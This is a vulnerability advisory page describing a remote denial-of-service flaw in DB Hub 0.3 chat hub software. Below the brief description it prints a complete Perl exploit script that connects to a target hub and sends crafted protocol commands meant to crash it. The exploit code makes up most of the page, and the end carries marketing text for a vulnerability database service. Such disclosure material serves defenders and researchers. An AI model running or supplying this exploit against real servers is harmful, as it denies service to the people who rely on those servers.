source: https://www.securityfocus.com/bid/21791/info
A remote denial-of-service vulnerability affects the DB Hub application because of a memory-corruption flaw when the application attempts to process specially crafted network traffic.
An attacker may exploit this issue to crash affected applications, denying service to legitimate users.
DB Hub version 0.3 is vulnerable to this issue; other versions may also be affected.
#!/usr/bin/perl
# DB Hub (http://dbhub.ir.pl/) DoS exploit
# Critical Security (http://www.critical.lt)
use IO::Socket;
my $host = $ARGV[0];
my $port = $ARGV[1];
my $nick = $ARGV[2];
print q(
----------------------------------------------
| DB Hub (http://dbhub.ir.pl/) DoS exploit |
----------------------------------------------
);
if (@ARGV < 3) {
print "Usage: perl crit_dbhub.pl host port nick\n";
exit();
}
if ($connect = IO::Socket::INET->new(PeerAddr => $host,
PeerPort => $port,
Proto => tcp,
Timeout => 5 )
or die "[-] Can't connect\n")
{
print "[+] Connected!\n";
}
$res = $connect->recv($text,200);
if ($text = ~/Lock/) { $connect->send("\$Key vistiek_netikrina|\$ValidateNick $nick|"); }
$connect->send("\$Version 20|\$MyINFO \$ALL $nick <++ V:0.674,M:A,H:1/0/0,S:11>\$ \$DSL.\$\$19313847685\$|\$GetNickList|");
$connect->send("<$nick>!|"); # xixi
print "[+] Data sent\n";
while($text) { $res = $connect->recv($text,200); }
print "[+] Done\n";Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation